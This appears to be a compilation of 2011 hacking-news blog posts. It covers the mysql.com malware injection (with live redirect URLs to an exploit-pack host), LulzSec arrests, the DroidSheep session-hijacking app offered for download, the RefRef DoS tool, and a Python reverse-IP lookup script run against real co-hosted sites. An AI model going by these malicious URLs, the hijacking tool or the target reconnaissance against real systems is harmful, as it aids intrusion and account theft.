Mysql.com Hacked , Infected with JavaScript Malware

mysql.com is hacked and is currently serving malware to visitors , says the report by armorize .The company have detected the malware using their malware monitoring platform called HackAlert . The mysql.com website is injected with a script that generates an iFrame that redirects the visitors to   http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php , where the BlackHole exploit pack is hosted.    


How Does The Injection Works 


Step 1: http://www.mysql.com

Causes the visiting browser to load the following:


Step 2: http://mysql.com/common/js/s_code_remote.js?ver=20091011 ( Don't Visit Now ) 

This is the injection point. you can find the entire content of the .js file  here.

The Infection Section '

Step 3:  http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/

Shows out a 302 redirect to Step 4.

Step 4: http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

This domain hosts the BlackHole exploit pack. It exploits the visitor's browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, ...), and upon successful exploitation, permanently installs a piece of malware into the visitor's machine, without the visitor's knowledge. The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.

Sucuri Security researchers have also confirmed this and according to them "  the site has been compromised via JavaScript malware that "infects a web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the site." 



[Source]

LulzSec member "Neuron" Tracked Down Via HideMyAss's Logs

One more member of the hacking group LulzSec, known as "Neuron", may be arrested if traced by their use of a British anonymous VPN , following a similar arrest last week of Cody Kretsinger, who was arrested by the FBI last Thursday for allegedly hacking into the Sony Pictures website, had been identified via his use of HideMyAss's proxy service to disguise his IP  address when connecting to the Sony Pictures site.

However a pastebin log shows that "Neuron" claims to use HideMyAss's Service in order to protect his identity.HideMyAss also posted a lengthy note regarding this topic of their blog after this new emerged.

HideMyAss " It first came to our attention when leaked IRC chat logs were released, in these logs participants discussed about various VPN services they use, and it became apparent that some members were using our service. No action was taken, after all there was no evidence to suggest wrongdoing and nothing to identify which accounts with us they were using. At a later date it came as no surprise to have received a court order asking for information relating to an account associated with some or all of the above cases. As stated in our terms of service and privacy policy our service is not to be used for illegal activity, and as a legitimate company we will cooperate with law enforcement if we receive a court order (equivalent of a subpoena in the US). " 

LulzSec is going down #The Fourth Arrest 

David Beckhams Dead And The Top 5 Twitter Hacks

David Beckham’s Dead And The Top 5 Twitter Hacks

This morning twitter lit up with a rumour that David Beckham had died. While it appears to be nothing more than a rumour, it is the latest in a long line of hacks and rumours that spread like wildfire across the social networks. Here are 5 other hacks that have made the front pages…
Topiary, not just a lovely bush, but the nickname for one of the super hackers behind Anonymous and LulzSec, is allegedly the 19 year old arrested in the Shetland Islands this week by British police, for crimes against cyberspace. The arrest is closely linked to an enormous investigation alongside the FBI into a denial-of-service attack on third party payment service PayPal, that took down the site for four days last December. The Anti-Security hacker movement, notoriously sympathetic to Julian Assange, targeted the company after PayPal suspended all donations to WikiLeaks. Following the arrest this week, LulzSec and Anonymous have turned their boycott up a notch, again persuading hundreds of users to close their PayPal accounts.
While Scotland Yard have not identified the teenager’s identity as Topiary, his usually active Twitter account is now sparse but for the singular statement “You cannot arrest an idea.” So, with one of the most outspoken advocates of the Anti-Security hacking movement now apparently on lockdown, we take a look at cyber pests’ favourite soap-box and target of choice, Twitter. While  enormously popular, Twitter is a hackers delight having both notoriously vulnerable security and the ability to spread news of a hack like an Australian bush fire.
PayPal

PayPal’s shoddy customer service has been the subject of bitter criticism from users, with the website www.paypalsucks.comlong established before any Twitter hijacking. But when the UK’s PayPal account profile picture was changed to a steaming pile of poop and re-directed followers to the hate-website, users instantly smelt a LulzSec rat. However, this turned out not to be the handiwork of a hardcore hacker but that of one particularly enraged customer. So that should make you feel safe giving them all your bank account details.
Britney Spears

If YouTube comments are to be believed, Britney Spears is indeed at the fiery helm of the Illuminati world domination committee, along with every other popstar ever. Complete with a new illiminaughty triangle plentiful background and profile picture, the hackers Tweeted Spears’ allegiance to Lucifer to her 3 million plus followers. While many famous Twitter’s have been broken into, including the obvious prey of uber celebs Justin Bieber and Lady GaGa, other than lots of capital letters and profanities, Britters’ account jacks have been the most imaginative, including when it was famously compromised to announce her own death. Cue a frenzy of hysterical RIP hash-tagging.
Fox News

Again, this beautiful Twitter hijack was initially suspected to be a LulzSec job but was in fact by fellow Internet scamps, Scriptkiddies. Both Fox’s site and social networks have been repeatedly attacked by a number of different hacking groups, one time satisfyingly announcing that Fox reporter and everything-o-phobe, Bill O’Reilly, was gay. Though the hijack earlier this July, is possibly one of the worst egg on their face blunders for Fox, as Scriptkiddies not only Tweeted that President Obama had been assassinated, but the rogue messages were not noticed or removed by Fox for nearly ten hours. A favourite punching bag for hacktivists, there’s sure to be more Fox fun to come.
Iranian Cyber Army

December 2009, and millions of Twitter users looking to post motivational quotes and share photos of their breakfast shot through a vintage photography filter, are instead confronted with an ominous Iranian Cyber Army page. A drastic attack on Twitter, the radical Shiite hackers were able to re-route the entire site. The hack was said to be in response to Twitter’s unwitting yet pivotal role during the unrest in Tehran, where protestors were able to push news out while skirting the Iranian government’s media crackdown. It was, sadly, seen by some as interference. While only KOing the site for an hour, it stands as Twitter’s worst security embarrassment to date.

Install Windows 8 Developer In Vmware

Several versions of Windows 8 Developer Preview are public available on Microsoft’s Windows Developer Preview downloads. Just pick the one that fits for you. The downloaded file is an ISO file. You don’t need to burn it on disc.

If you don’t have a spare computer where you can install Windows 8 Developer Preview on, you can install it on your own machine using VMware. First you’ll need VMware Workstation 8 or VMware Player 4. The latter one is free, but at this moment you can only get it by downloading VMware Workstation 8. Don’t worry if you don’t have a license, you don’t need one because we will only use the free VMware Player 4. If you want full functionality you can download a trial version. For both downloads you’ll need to create an account. Go ahead and download and install VMware 8 if you have not already.

In this little tutorial I will use VMware Player, but the steps are nearly the same for VMware Workstation. Start VMware Player and click “Create a New Virtual Machine”. In the window that pops up, make sure you choose “I will install the operating system later.”



If you select one of the other options, you’ll get in trouble when Windows 8 Developer Preview is installing. Because in one of the next screens of the VMware wizard you’ll be asked to enter the license key for Windows 8 Developer Preview which you don’t have. You can leave it empty, but when Windows 8 Developer Preview is installing you’ll get the following error: “Windows cannot read the <ProductKey> setting from the unattend answer file”.



So, let’s proceed with the last option and click “Next >”. Depending on which version you have downloaded, select “Windows 7” or “Windows 7 x64” as operating system. I have downloaded the 64-bit version, so I chose “Windows 7 x64”.



Enter a Virtual machine name in the next step, for instance “Windows 8 Developer Preview”, and set the location of your virtual machine. I did not change anything in the next steps of the wizards, but you can choose the maximum disk size (default 60GB), whether to split the virtual disk or not. If you want to adjust the default allocated memory (1GB) you’ll need to click on “Customize Hardware…” in the last step to change it. This is my summary screen:



Click “Finish” and select the created virtual machine in VMware Player. Open the Virtual Machine Settings by clicking “Edit virtual machine settings” and select “CD/DVD IDE” in the device list. Make sure “Connect at power on” is checked and that you point it to the downloaded ISO file.



Click “OK” and power on the virtual machine. The Windows 8 Developer Preview installation wizard will start. At the end you can enjoy Windows 8 Developer Preview! One more tip: the metro style apps will only run if your screen resolution is at least 1024x768 (hardware or virtual machine).

Windows Update Can Be Hacked

yeah windows update can be hacked

Comodohacker: I can hack Windows Update

Hackable??

Following on from the recent hack attack carried out against Dutch security specialist DigiNotar , it would appear notorious hacker Comodohacker is setting his/her sights on a significantly bigger target. 

Moreover, while claiming to be “so smart, sharp, dangerous [and] powerful”, the hacker has offered up a statement conflicting directly with Microsoft’s recent insistence that its Windows Update system cannot be compromised.

“I’m able to issue Windows updates—Microsoft’s statement about Windows Update and that I can’t issue such [an] update is totally false,” the hacker wrote via Pastebin. “Simply I can issue updates via Windows Update!”

“I already reversed ENTIRE Windows update protocol, how it reads XMLs via SSL, which includes URL, KB no, SHA-1 hash of file for each update, how it verifies that downloaded file is signed using WinVerifyTrust API,” the post boasted.

Although Microsoft remains staunch in its belief that Windows Update cannot be circumvented “even to an attacker with a fraudulent certificate”, hundreds of millions of unwitting users could face a flood of malware if Comodohacker is able to make good on the claim.

“Attackers are not able to leverage a fraudulent Windows Update certificate to install malware via the Windows Update servers”, wrote the software giant via its official blog.

“The Windows Update client will only install binary payloads signed by the actual Microsoft root CA certificate, which is issued and secured by Microsoft,” it added.

DROIDSHEEP

DROIDSHEEP SESSION HIJACKING ANDROID APPLICATION: 
Droidsheep is free alternate of faceniff which is available on download droidsheep website for free.Its one click hijacking tool which supports

- amazon.de
– facebook.com
– fl ickr.com
– twitter.com
– linkedin.com
– yahoo.com
– live.com
– google.de (only the non-encrypted services like “maps”)


Limitations of Droidsheep

DroidSheep now supports OPEN, WEP, WPA and WPA2 secured networks.
For WPA/WPA2 it uses an DNS-Spoofing attack.
DNS-Spoofing, means it makes all devices within the network think, the DroisSheep-device is the router and sending their data to the device. This might have an impact to the network and cause connection problems or bandwith-limitations – and it can be spotted. DroidSheeps attack can not, as it only reads the packets sent over the WiFi, but instead of dismissing them, it uses the data

What do you need to run DroidSheep?
- You need an android-powered device, running at least version 2.1 of Android
- You need Root-Access on your phone (link)
- You need DroidSheep (You can get it in the “GET IT” section)


you can download Droidsheep android application here

Hackers Brings Down Linux Websites

Hackers Brings Down Linux Websites



A number of Linux websites, including LinuxFoundation.org and Linux.com, have been pulled offline after a security breach.

The breach is believed to be related to the hack of the Kernel.org website that is home to the Linux Project, nearly two weeks ago.

In a holding message on its website, the Linux Foundation said that it had discovered a security breach on Sept. 8, which led to its taking down the Linux websites and their subdomains for maintenance.

The Linux Foundation infrastructure also supports services such as Open Printing and Linux Mark. However, it does not house the Linux kernel or its code repositories.

"The Linux Foundation made this decision in the interest of extreme caution and security best practices.

"We believe this breach was connected to the intrusion on kernel.org," the statement on Linux Foundation said.

While the Linux Foundation is restoring services, it warned users that their passwords may be compromised, and advised them to change them urgently:

"As with any intrusion and as a matter of caution, you should consider the passwords and SSH keys that you have used on these sites compromised. If you have reused these passwords on other sites, please change them immediately."

The foundation added that it is auditing all its systems, and will provide an updated statement when it has more information.

Users who want to find out more about the issue can contact the foundation on info@linuxfoundation.org.

WikiLeaks knocked offline by Anonymous RefRef due Sept 17

WikiLeaks knocked offline by Anonymous - RefRef due Sept. 17

wikileaks.org taken offline during refref test

On Tuesday, WikiLeaks.org crashed, under what the organization called a heavy cyberattack. However, the developer behind RefRef, an application created for those associating with Anonymous to use instead of LOIC, said that WikiLeaks was taken offline during a test of the new tool. RefRef will be tested again Wednesday, before it is released on September 17.

RefRef is platform neutral tool, leveraging JavaScript and vulnerabilities within SQL to create a devastating impact on the targeted website. In late July, an Anon on IRC was promoting the tool, explaining to those in a room frequented by journalists that RefRef is pure JavaScript, and uses the target site’s own processing power against itself. In the end, the server succumbs to resource exhaustion due to RefRef’s usage.

As it turns out, the attack is launched client side, and will send a separate script in the connection request made to the target server. This request is actually the exploit itself, and once the server renders the code, it will continue to render it until crashing. In essence, the stronger the server, the faster it crashes. All from a JavaScript file that is no more than 52 lines of code.

At the time, The Tech Herald was able to get the Anon to open up some on the tool itself. “Imagine giving a large beast a simple carrot, [and then] watching the best choke itself to death,” explained the Anon promoting the tool.

Testing the code in July, a run of 17 seconds led to a 42 minute outage on Pastebin.com, which was confirmed by Pastebin on Twitter. The test on Tuesday, which targeted WikiLeaks.org, lasted just 72 seconds.

“WikiLeaks is currently under heavy attack. In order to fully protect the CableGate archives, we ask you to mirror it again,” the organization told Twitter followers.

It was assumed by the AP and other news organizations that WikiLeaks was down due to the controversy surrounding the latest batch of diplomatic cables.

As this was being written, the developers tested RefRef again, this time targeting 4Chan.org. The imageboard was offline for just a few minutes. This test lasted 16 seconds. StormFront.org was also an unwilling test subject. A 12 second test knocked the site offline for about two minutes.

In July, the Anon who announced RefRef told The Tech Herald that the tool itself exploits server vulnerabilities, and will work as long as the target server supports JavaScript and some type of SQL. Asked if the vulnerability being exploited could be patched, the Anon responded that it could, but added that administrators would have to “mass-patch” a file that actually affects many services.

As it turns out, this was incorrect. Originally, patching was unlikely to stop RefRef because, “most SQL servers are pulling from a master SQL host” and the tool itself targets “one of the most common SQL services, but also one of the most widespread,” the Anon added.

However, this has changed. Early Wednesday, the Anon who was testing RefRef before its release, said “…it seems they can patch it easily, not having to patch the SQL host.”

So once the SQL patch is released, and there is one coming, the tool itself will be useless. “A SQL patch will be out within a week, so we must all use it on the sites fast,” the Anon explained.

According to statements on Twitter, RefRef will be tested on Wednesday, against a high profile site, before its release to the public on September 17. Administrators wishing to get ahead of the game may want to watch for patch releases this month.

Google Web History Vulnerable to Firesheep Hack

Google Web History Vulnerable to Firesheep Hack

Two researchers have shown how a modded version of the Firesheep Wi-Fi sniffing tool can be used to access most of a victim's Google Web History, a record of everything an individual has searched for.

The core weakness discovered by the proof-of-concept attack devised by Vincent Toubiana and Vincent Verdot lies with what is called a Session ID (SID) cookie, used to identify a user to each service they access while logged in to one of Google's services.

Every time the user accesses an application, the same SID cookie is sent in the clear, which the Firesheep captures from the data sent to and from a PC connected to a non-encrypted public Wi-Fi hotspot.
Because many of Google's services use HTTPS (Gmail for instance), the attacker has to find a way to get the user to resend this SID. The most direct method is to set up a rogue access point and then use an iFrame to direct the user to a Google service (such as Alerts) that doesn't use an encrypted channel.

The attack also requires that the user has Google Web History tracking turned on. This is the system that keeps tabs of a user's search history and many people are not even aware exists because it is set as during Google's account setup procedure.

Testing the technique against ten volunteers, the researchers were able to retrieve up to 82 percent of the links visited by them during the test period.

The only current defense against this attack is for users to remains signed out of Google while using a Wi-Fi hotspot or to set up a personal VPN. Users could also disable Google Web History or purge its contents.

However, note Toubiana and Verdot also note that, "some issues cannot be addressed by users and require a modification of Google's cookie policy," The major worry remains the expansion of Google's tracking to other types of data in its Google+ service. "As Google is taking steps to include social indicators in result personalization, user's social network could soon be exposed."

Firesheep is a browser-based plug-in published a year ago by security developer Eric Butler to highlight security vulnerabilities in the way cookies for sites such as Facebook and Twitter were being exchanged across open Wi-Fi links without HTTPS turned on. Although not a new issue, Firesheep showed how easy it was to turn the flaw into a simple tool that could be used by any attacker.

Threats posted on White House Facebook page

Threatening messages have been posted on the White House Facebook page amid heightened alerts surrounding a possible 9/11 terror threat.

"We'll come back U.S.A. One day only 11/9/2011," says one message, featuring a photo of Osama bin Laden, using the date/month formula to reference Sept. 11.

"We'll come to u white house sooooooooooon," says another.

"We'll come back 11/9/2011 to kill u all," a third posting reads.

New York City and Washington, D.C., have tightened security after intelligence collected from overseas indicated a possible threat involving car bombs, as well threats to bridges and tunnels. The information indicated that three men would travel from Pakistan to the U.S. to carry out an attack.

The threat has been described as "specific" and "credible" but not confirmed.

FBI Joint Terrorism Task Force officials across the country have been conducting interviews to eliminate hundreds of people who could match travel patterns of terrorists.

A government official stresses security officials do not know if any terror suspect entered the United States at all, and the questioning of travelers across the country is precautionary and is meant to rule people out.

Airline passenger arrival records are being checked against the few vague details the source offered, including age range, approximate heights, fragments of names, and travel patterns.
That chore is complicated by the possibility that the men may have been smuggled into and out of Pakistan, leaving no record they were ever there.

Law enforcement officials say hundreds of recent arrivals have already been checked and ruled out. Some of that can be done merely by reference to the records, but in other cases, in-person interviews are being conducted.

And around New York and Washington, officials say the FBI has found no sign of unusual purchases of chemicals needed to make car bombs.

A joint FBI-Department of Homeland Security bulletin from Thursday said al-Qaida may be considering attacks that use improvised explosives packed in vehicles, similar to the "attempted attack on Times square" by Faisal Shahzad in May 2010.
Al-Qaida may be aiming to avenge the death of Osama bin Laden and other key terror figures, the bulletin said.

Officials were also investigating information about two construction vans stolen along roads in Queens on Sept. 1 or 2. A government official says the theft may have been from somebody working with the van, theorizing that it may be an inside job.

Along with the vans, $70,000 in construction equipment was reported stolen.
The alleged terror threat by al-Qaida against New York City and Washington D.C has brought additional police officers, vehicle checkpoints, and subway bag checks.

Finding domains on targeted host | Reverse IP lookup

" Reverse IP Lookup " is a very  useful concept for the penetration testers to find out domains which are hosted in targeted host  . Using this concept you can find out the number of domains hosted on a server lets say s4ur4v.com is a server with a server address 1.1.1.1 now when you do a reverse IP lookup on that server you will find the other domains hosted on the same server.

Whats the theory behind this  ?
All web servers are assigned with a unique IP address . If a web server is running a website the IP a address of the site will be same as that of the server. Now if there are multiple domains hosted on the same web server  they will be also having the same IP address of the server . By using this concept " Reverse IP Lookup " we instruct the lookup process to look the number of domains on the target server/host 

How to do a Reverse IP Lookup ? 

Their are a lots of ready made sites which offer you to do a reverse IP look up like yougetsignal

-Go to http://www.yougetsignal.com/
-Gype the server address / website URL
-Click on check and bingo you get the number of domains on the server you looked up

Next i will show you how to do this with a python script which will be using Bing's API to find our dinner ( You can use also DRIL which uses the same )

1. import httplib, urllib, socket, sys
2. from xml.dom.minidom import parse, parseString
5. if len(sys.argv) == 2:
6.  AppId = '1734E2C92CA63FAA596335295B09CF1D0B5C6161'
7.  domain = sys.argv[1]
8.  sites = [domain]
10.  ip = socket.gethostbyname(domain)
11.  offset = 50
12.  while offset < 300:
13.   uri = "/xml.aspx?AppId=%s&Query=ip:%s&Sources=Web&Version=2.0&Market=en-us&Adult=Moderate&Options=EnableHighlighting&Web.Count=50&Web.Offset=%s&Web.Options=DisableQueryAlterations"%(AppId, ip, offset)
15.   conn = httplib.HTTPConnection("api.bing.net")
16.   conn.request("GET", uri)
17.   res = conn.getresponse()
18.   data = res.read()
19.   conn.close()
22.   xmldoc = parseString(data)
23.   nameEls = xmldoc.getElementsByTagName('web:DisplayUrl')
24.   for el in nameEls:
25.    temp = el.childNodes[0].nodeValue
26.    temp = temp.split("/")[0]
27.    if temp.find('www.') == -1:
28.     if temp not in sites:
29.      sites.append(temp)
31.   offset += 50
33.  print "\n\n"
34.  print "Total: %d domain(s)\n\n"%len(sites)
35.  for i in sites:
36.   print i
37.  print "\n\n"
39. else:
40.  print "\n\n\n"
41.  print "=====================================\n"
42.  print "Usage: $ python reverse.py domain.com\n"
43.  print "Ex: $ python reverse.py hackersbay.in   \n"
44.  print "=====================================\n"
45.  print "\n\n\n"

Windows users please mind it you have python installed in your OS before running this script.I am going to show it using Backtrack 

- Copy the above script and paste it in a file rename it to reverse.py

- Browse through the directory you saved the file in e.g cd /dir 

- to execute the script you have to just write python reverse.py and then it will show you the how to do the rest :D 

root@bt:~# cd /pentest 

root@bt:/pentest# python reverse.py 

=====================================

Usage: $ python reverse.py domain.com

Ex: $ python reverse.py enhack.net   

=====================================

root@bt:/pentest# python reverse.py davunit8.org

Total: 103 domain(s)

davunit8.org

psplindia.com

jnvkeonjhar.com

microfinanceltd.com

puspitamishra.com

htti-cuttack.com

neemworld.com

keonjhar.net

origininfosystem.com

cippl.com

newditech.com

caravanholidaysindia.com

niateducation.com

sunrayadv.com

spanscaffold.com

suinsys.com

ihmbbs.org

mohindratourist.com

hiem-bdk.org

immunologyofdiabetessociety.com

pipilicrafts.com

dhaneswarinstitutekatak.com

indomer.com

itibalasore.org... continues 

I missed something ? feel free to comment